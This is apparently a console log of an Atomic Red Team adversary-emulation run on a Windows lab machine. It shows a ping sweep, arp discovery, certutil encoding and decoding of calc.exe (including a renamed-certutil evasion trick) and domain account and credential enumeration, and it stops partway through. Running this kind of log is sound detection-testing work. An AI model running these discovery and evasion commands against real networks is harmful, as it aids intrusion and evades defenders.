4847C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.187
4848
4849Pinging 192.168.1.187 with 32 bytes of data:
4850Request timed out.
4851
4852Ping statistics for 192.168.1.187:
4853 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4854
4855C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.188
4856
4857Pinging 192.168.1.188 with 32 bytes of data:
4858Request timed out.
4859
4860Ping statistics for 192.168.1.188:
4861 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4862
4863C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.189
4864
4865Pinging 192.168.1.189 with 32 bytes of data:
4866Request timed out.
4867
4868Ping statistics for 192.168.1.189:
4869 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4870
4871C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.190
4872
4873Pinging 192.168.1.190 with 32 bytes of data:
4874Request timed out.
4875
4876Ping statistics for 192.168.1.190:
4877 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4878
4879C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.191
4880
4881Pinging 192.168.1.191 with 32 bytes of data:
4882Request timed out.
4883
4884Ping statistics for 192.168.1.191:
4885 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4886
4887C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.192
4888
4889Pinging 192.168.1.192 with 32 bytes of data:
4890Request timed out.
4891
4892Ping statistics for 192.168.1.192:
4893 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4894
4895C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.193
4896
4897Pinging 192.168.1.193 with 32 bytes of data:
4898Request timed out.
4899
4900Ping statistics for 192.168.1.193:
4901 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4902
4903C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.194
4904
4905Pinging 192.168.1.194 with 32 bytes of data:
4906Request timed out.
4907
4908Ping statistics for 192.168.1.194:
4909 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4910
4911C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.195
4912
4913Pinging 192.168.1.195 with 32 bytes of data:
4914Request timed out.
4915
4916Ping statistics for 192.168.1.195:
4917 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4918
4919C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.196
4920
4921Pinging 192.168.1.196 with 32 bytes of data:
4922Request timed out.
4923
4924Ping statistics for 192.168.1.196:
4925 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4926
4927C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.197
4928
4929Pinging 192.168.1.197 with 32 bytes of data:
4930Request timed out.
4931
4932Ping statistics for 192.168.1.197:
4933 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4934
4935C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.198
4936
4937Pinging 192.168.1.198 with 32 bytes of data:
4938Request timed out.
4939
4940Ping statistics for 192.168.1.198:
4941 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4942
4943C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.199
4944
4945Pinging 192.168.1.199 with 32 bytes of data:
4946Request timed out.
4947
4948Ping statistics for 192.168.1.199:
4949 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4950
4951C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.200
4952
4953Pinging 192.168.1.200 with 32 bytes of data:
4954Request timed out.
4955
4956Ping statistics for 192.168.1.200:
4957 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4958
4959C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.201
4960
4961Pinging 192.168.1.201 with 32 bytes of data:
4962Request timed out.
4963
4964Ping statistics for 192.168.1.201:
4965 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4966
4967C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.202
4968
4969Pinging 192.168.1.202 with 32 bytes of data:
4970Request timed out.
4971
4972Ping statistics for 192.168.1.202:
4973 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4974
4975C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.203
4976
4977Pinging 192.168.1.203 with 32 bytes of data:
4978Request timed out.
4979
4980Ping statistics for 192.168.1.203:
4981 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4982
4983C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.204
4984
4985Pinging 192.168.1.204 with 32 bytes of data:
4986Request timed out.
4987
4988Ping statistics for 192.168.1.204:
4989 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4990
4991C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.205
4992
4993Pinging 192.168.1.205 with 32 bytes of data:
4994Request timed out.
4995
4996Ping statistics for 192.168.1.205:
4997 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4998
4999C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.206
5000
5001Pinging 192.168.1.206 with 32 bytes of data:
5002Request timed out.
5003
5004Ping statistics for 192.168.1.206:
5005 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5006
5007C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.207
5008
5009Pinging 192.168.1.207 with 32 bytes of data:
5010Request timed out.
5011
5012Ping statistics for 192.168.1.207:
5013 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5014
5015C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.208
5016
5017Pinging 192.168.1.208 with 32 bytes of data:
5018Request timed out.
5019
5020Ping statistics for 192.168.1.208:
5021 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5022
5023C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.209
5024
5025Pinging 192.168.1.209 with 32 bytes of data:
5026Request timed out.
5027
5028Ping statistics for 192.168.1.209:
5029 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5030
5031C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.210
5032
5033Pinging 192.168.1.210 with 32 bytes of data:
5034Request timed out.
5035
5036Ping statistics for 192.168.1.210:
5037 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5038
5039C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.211
5040
5041Pinging 192.168.1.211 with 32 bytes of data:
5042Request timed out.
5043
5044Ping statistics for 192.168.1.211:
5045 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5046
5047C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.212
5048
5049Pinging 192.168.1.212 with 32 bytes of data:
5050Request timed out.
5051
5052Ping statistics for 192.168.1.212:
5053 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5054
5055C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.213
5056
5057Pinging 192.168.1.213 with 32 bytes of data:
5058Request timed out.
5059
5060Ping statistics for 192.168.1.213:
5061 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5062
5063C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.214
5064
5065Pinging 192.168.1.214 with 32 bytes of data:
5066Request timed out.
5067
5068Ping statistics for 192.168.1.214:
5069 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5070
5071C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.215
5072
5073Pinging 192.168.1.215 with 32 bytes of data:
5074Request timed out.
5075
5076Ping statistics for 192.168.1.215:
5077 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5078
5079C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.216
5080
5081Pinging 192.168.1.216 with 32 bytes of data:
5082Request timed out.
5083
5084Ping statistics for 192.168.1.216:
5085 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5086
5087C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.217
5088
5089Pinging 192.168.1.217 with 32 bytes of data:
5090Request timed out.
5091
5092Ping statistics for 192.168.1.217:
5093 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5094
5095C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.218
5096
5097Pinging 192.168.1.218 with 32 bytes of data:
5098Request timed out.
5099
5100Ping statistics for 192.168.1.218:
5101 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5102
5103C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.219
5104
5105Pinging 192.168.1.219 with 32 bytes of data:
5106Request timed out.
5107
5108Ping statistics for 192.168.1.219:
5109 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5110
5111C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.220
5112
5113Pinging 192.168.1.220 with 32 bytes of data:
5114Request timed out.
5115
5116Ping statistics for 192.168.1.220:
5117 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5118
5119C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.221
5120
5121Pinging 192.168.1.221 with 32 bytes of data:
5122Request timed out.
5123
5124Ping statistics for 192.168.1.221:
5125 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5126
5127C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.222
5128
5129Pinging 192.168.1.222 with 32 bytes of data:
5130Request timed out.
5131
5132Ping statistics for 192.168.1.222:
5133 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5134
5135C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.223
5136
5137Pinging 192.168.1.223 with 32 bytes of data:
5138Request timed out.
5139
5140Ping statistics for 192.168.1.223:
5141 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5142
5143C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.224
5144
5145Pinging 192.168.1.224 with 32 bytes of data:
5146Request timed out.
5147
5148Ping statistics for 192.168.1.224:
5149 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5150
5151C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.225
5152
5153Pinging 192.168.1.225 with 32 bytes of data:
5154Request timed out.
5155
5156Ping statistics for 192.168.1.225:
5157 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5158
5159C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.226
5160
5161Pinging 192.168.1.226 with 32 bytes of data:
5162Request timed out.
5163
5164Ping statistics for 192.168.1.226:
5165 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5166
5167C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.227
5168
5169Pinging 192.168.1.227 with 32 bytes of data:
5170Request timed out.
5171
5172Ping statistics for 192.168.1.227:
5173 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5174
5175C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.228
5176
5177Pinging 192.168.1.228 with 32 bytes of data:
5178Request timed out.
5179
5180Ping statistics for 192.168.1.228:
5181 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5182
5183C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.229
5184
5185Pinging 192.168.1.229 with 32 bytes of data:
5186Request timed out.
5187
5188Ping statistics for 192.168.1.229:
5189 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5190
5191C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.230
5192
5193Pinging 192.168.1.230 with 32 bytes of data:
5194Request timed out.
5195
5196Ping statistics for 192.168.1.230:
5197 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5198
5199C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.231
5200
5201Pinging 192.168.1.231 with 32 bytes of data:
5202Request timed out.
5203
5204Ping statistics for 192.168.1.231:
5205 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5206
5207C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.232
5208
5209Pinging 192.168.1.232 with 32 bytes of data:
5210Request timed out.
5211
5212Ping statistics for 192.168.1.232:
5213 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5214
5215C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.233
5216
5217Pinging 192.168.1.233 with 32 bytes of data:
5218Request timed out.
5219
5220Ping statistics for 192.168.1.233:
5221 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5222
5223C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.234
5224
5225Pinging 192.168.1.234 with 32 bytes of data:
5226Request timed out.
5227
5228Ping statistics for 192.168.1.234:
5229 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5230
5231C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.235
5232
5233Pinging 192.168.1.235 with 32 bytes of data:
5234Request timed out.
5235
5236Ping statistics for 192.168.1.235:
5237 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5238
5239C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.236
5240
5241Pinging 192.168.1.236 with 32 bytes of data:
5242Request timed out.
5243
5244Ping statistics for 192.168.1.236:
5245 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5246
5247C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.237
5248
5249Pinging 192.168.1.237 with 32 bytes of data:
5250Request timed out.
5251
5252Ping statistics for 192.168.1.237:
5253 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5254
5255C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.238
5256
5257Pinging 192.168.1.238 with 32 bytes of data:
5258Request timed out.
5259
5260Ping statistics for 192.168.1.238:
5261 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5262
5263C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.239
5264
5265Pinging 192.168.1.239 with 32 bytes of data:
5266Request timed out.
5267
5268Ping statistics for 192.168.1.239:
5269 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5270
5271C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.240
5272
5273Pinging 192.168.1.240 with 32 bytes of data:
5274Request timed out.
5275
5276Ping statistics for 192.168.1.240:
5277 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5278
5279C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.241
5280
5281Pinging 192.168.1.241 with 32 bytes of data:
5282Request timed out.
5283
5284Ping statistics for 192.168.1.241:
5285 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5286
5287C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.242
5288
5289Pinging 192.168.1.242 with 32 bytes of data:
5290Request timed out.
5291
5292Ping statistics for 192.168.1.242:
5293 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5294
5295C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.243
5296
5297Pinging 192.168.1.243 with 32 bytes of data:
5298Request timed out.
5299
5300Ping statistics for 192.168.1.243:
5301 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5302
5303C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.244
5304
5305Pinging 192.168.1.244 with 32 bytes of data:
5306Request timed out.
5307
5308Ping statistics for 192.168.1.244:
5309 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5310
5311C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.245
5312
5313Pinging 192.168.1.245 with 32 bytes of data:
5314Request timed out.
5315
5316Ping statistics for 192.168.1.245:
5317 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5318
5319C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.246
5320
5321Pinging 192.168.1.246 with 32 bytes of data:
5322Request timed out.
5323
5324Ping statistics for 192.168.1.246:
5325 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5326
5327C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.247
5328
5329Pinging 192.168.1.247 with 32 bytes of data:
5330Request timed out.
5331
5332Ping statistics for 192.168.1.247:
5333 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5334
5335C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.248
5336
5337Pinging 192.168.1.248 with 32 bytes of data:
5338Request timed out.
5339
5340Ping statistics for 192.168.1.248:
5341 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5342
5343C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.249
5344
5345Pinging 192.168.1.249 with 32 bytes of data:
5346Request timed out.
5347
5348Ping statistics for 192.168.1.249:
5349 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5350
5351C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.250
5352
5353Pinging 192.168.1.250 with 32 bytes of data:
5354Request timed out.
5355
5356Ping statistics for 192.168.1.250:
5357 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5358
5359C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.251
5360
5361Pinging 192.168.1.251 with 32 bytes of data:
5362Request timed out.
5363
5364Ping statistics for 192.168.1.251:
5365 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5366
5367C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.252
5368
5369Pinging 192.168.1.252 with 32 bytes of data:
5370Request timed out.
5371
5372Ping statistics for 192.168.1.252:
5373 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5374
5375C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.253
5376
5377Pinging 192.168.1.253 with 32 bytes of data:
5378Request timed out.
5379
5380Ping statistics for 192.168.1.253:
5381 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5382
5383C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.254
5384
5385Pinging 192.168.1.254 with 32 bytes of data:
5386Request timed out.
5387
5388Ping statistics for 192.168.1.254:
5389 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
5390Determining tests for Windows
5391Determining manual tests
5392[********BEGIN TEST*******]
5393Remote System Discovery T1018
5394Remote System Discover - arp
5395Identify remote systems via arp
5396
5397Invoking Atomic Tests using defined executor
5398Performing the operation "Execute Atomic Test" on target "Remote System Discover - arp".
5399Command Prompt:
5400 arp -a
5401
5402Command Prompt:
5403 arp -a
5404
5405
5406Interface: 172.18.39.105 --- 0x9
5407 Internet Address Physical Address Type
5408 169.254.169.254 06-58-be-8e-50-97 dynamic
5409 172.18.39.1 06-58-be-8e-50-97 dynamic
5410 172.18.39.5 06-58-a0-24-7b-41 dynamic
5411 172.18.39.102 06-95-f4-36-cf-05 dynamic
5412 172.18.39.137 06-82-00-3e-1a-ed dynamic
5413 172.18.39.255 ff-ff-ff-ff-ff-ff static
5414 224.0.0.22 01-00-5e-00-00-16 static
5415 224.0.0.251 01-00-5e-00-00-fb static
5416 224.0.0.252 01-00-5e-00-00-fc static
5417 239.255.255.250 01-00-5e-7f-ff-fa static
5418 255.255.255.255 ff-ff-ff-ff-ff-ff static
5419Determining tests for Windows
5420Unable to run non-Windows tests
5421Determining tests for Windows
5422Unable to run non-Windows tests
5423[!!!!!!!!END TEST!!!!!!!]
5424
5425
5426Executing T1140 technique
5427Attempting to run Atomic Techniques
5428Tarcking UUID is T1140_atomictest
5429Attempting to convert files from yaml
5430path: C:\AtomicRedTeam\atomics\T1140\T1140.yaml
5431file: C:\AtomicRedTeam\atomics\T1140\T1140.yaml
5432Converting C:\AtomicRedTeam\atomics\T1140\T1140.yaml from Yaml
5433Determining tests for Windows
5434Determining manual tests
5435[********BEGIN TEST*******]
5436Deobfuscate/Decode Files Or Information T1140
5437Deobfuscate/Decode Files Or Information
5438Encode/Decode executable
5439
5440Replacing inputArgs with default values
5441Invoking Atomic Tests using defined executor
5442Performing the operation "Execute Atomic Test" on target "Deobfuscate/Decode Files Or Information".
5443Command Prompt:
5444 del C:\Windows\Temp\calc.exe
5445del file.txt
5446certutil.exe -encode C:\Windows\System32\calc.exe file.txt
5447certutil.exe -decode file.txt C:\Windows\Temp\calc.exe
5448
5449Command Prompt:
5450 del C:\Windows\Temp\calc.exe
5451del file.txt
5452certutil.exe -encode C:\Windows\System32\calc.exe file.txt
5453certutil.exe -decode file.txt C:\Windows\Temp\calc.exe
5454
5455cmd.exe : Could Not Find C:\Windows\Temp\calc.exe
5456At line:1 char:1
5457+ cmd.exe /c "del C:\Windows\Temp\calc.exe"
5458+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5459 + CategoryInfo : NotSpecified: (Could Not Find C:\Windows\Temp\calc.exe:String) [], RemoteException
5460 + FullyQualifiedErrorId : NativeCommandError
5461
5462cmd.exe : Could Not Find C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46\file.txt
5463At line:1 char:1
5464+ cmd.exe /c "del file.txt"
5465+ ~~~~~~~~~~~~~~~~~~~~~~~~~
5466 + CategoryInfo : NotSpecified: (Could Not Find ..._03_46\file.txt:String) [], RemoteException
5467 + FullyQualifiedErrorId : NativeCommandError
5468
5469Input Length = 27648
5470Output Length = 38072
5471CertUtil: -encode command completed successfully.
5472Input Length = 38072
5473Output Length = 27648
5474CertUtil: -decode command completed successfully.
5475Determining tests for Windows
5476Determining manual tests
5477[********BEGIN TEST*******]
5478Deobfuscate/Decode Files Or Information T1140
5479Certutil Rename and Decode
5480Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/bl
5481og/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
5482
5483Replacing inputArgs with default values
5484Invoking Atomic Tests using defined executor
5485Performing the operation "Execute Atomic Test" on target "Certutil Rename and Decode".
5486Command Prompt:
5487 cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
5488cmd.exe /c %temp%tcm.tmp -decode file.txt calc.exe
5489
5490Command Prompt:
5491 cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
5492cmd.exe /c %temp%tcm.tmp -decode file.txt calc.exe
5493
5494 1 file(s) copied.
5495(null)
5496(null)
5497(null)
5498[!!!!!!!!END TEST!!!!!!!]
5499
5500
5501Executing T1087 technique
5502Attempting to run Atomic Techniques
5503Tarcking UUID is T1087_atomictest
5504Attempting to convert files from yaml
5505path: C:\AtomicRedTeam\atomics\T1087\T1087.yaml
5506file: C:\AtomicRedTeam\atomics\T1087\T1087.yaml
5507Converting C:\AtomicRedTeam\atomics\T1087\T1087.yaml from Yaml
5508Determining tests for Windows
5509Unable to run non-Windows tests
5510Determining tests for Windows
5511Unable to run non-Windows tests
5512Determining tests for Windows
5513Unable to run non-Windows tests
5514Determining tests for Windows
5515Unable to run non-Windows tests
5516Determining tests for Windows
5517Unable to run non-Windows tests
5518Determining tests for Windows
5519Unable to run non-Windows tests
5520Determining tests for Windows
5521Determining manual tests
5522[********BEGIN TEST*******]
5523Account Discovery T1087
5524Enumerate all accounts
5525Enumerate all accounts
5526
5527Invoking Atomic Tests using defined executor
5528Performing the operation "Execute Atomic Test" on target "Enumerate all accounts".
5529Command Prompt:
5530 net user
5531net user /domain
5532get-localuser
5533get-localgroupmembers -group Users
5534cmdkey.exe /list
5535ls C:/Users
5536get-childitem C:\Users\
5537dir C:\Users\
5538get-aduser -filter *
5539get-localgroup
5540net localgroup
5541
5542Command Prompt:
5543 net user
5544net user /domain
5545get-localuser
5546get-localgroupmembers -group Users
5547cmdkey.exe /list
5548ls C:/Users
5549get-childitem C:\Users\
5550dir C:\Users\
5551get-aduser -filter *
5552get-localgroup
5553net localgroup
5554
5555
5556User accounts for \\IT001
5557
5558-------------------------------------------------------------------------------
5559Administrator Atomic DefaultAccount
5560Guest User WDAGUtilityAccount
5561The command completed successfully.
5562
5563The request will be processed at a domain controller for domain shire.com.
5564
5565
5566User accounts for \\HFDC1.shire.com
5567
5568-------------------------------------------------------------------------------
5569Administrator aragorn bilbo
5570boromir DefaultAccount elrond
5571frodo gandalf gimili
5572Guest krbtgt legolas
5573lrodriguez merry nmartha
5574pgustavo pippin samwise
5575saruman smaug wecserver
5576The command completed successfully.
5577
5578cmd.exe : 'get-localuser' is not recognized as an internal or external command,
5579At line:1 char:1
5580+ cmd.exe /c "get-localuser"
5581+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
5582 + CategoryInfo : NotSpecified: ('get-localuser'...ternal command,:String) [], RemoteException
5583 + FullyQualifiedErrorId : NativeCommandError
5584
5585operable program or batch file.
5586
5587cmd.exe : 'get-localgroupmembers' is not recognized as an internal or external command,
5588At line:1 char:1
5589+ cmd.exe /c "get-localgroupmembers -group Users"
5590+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
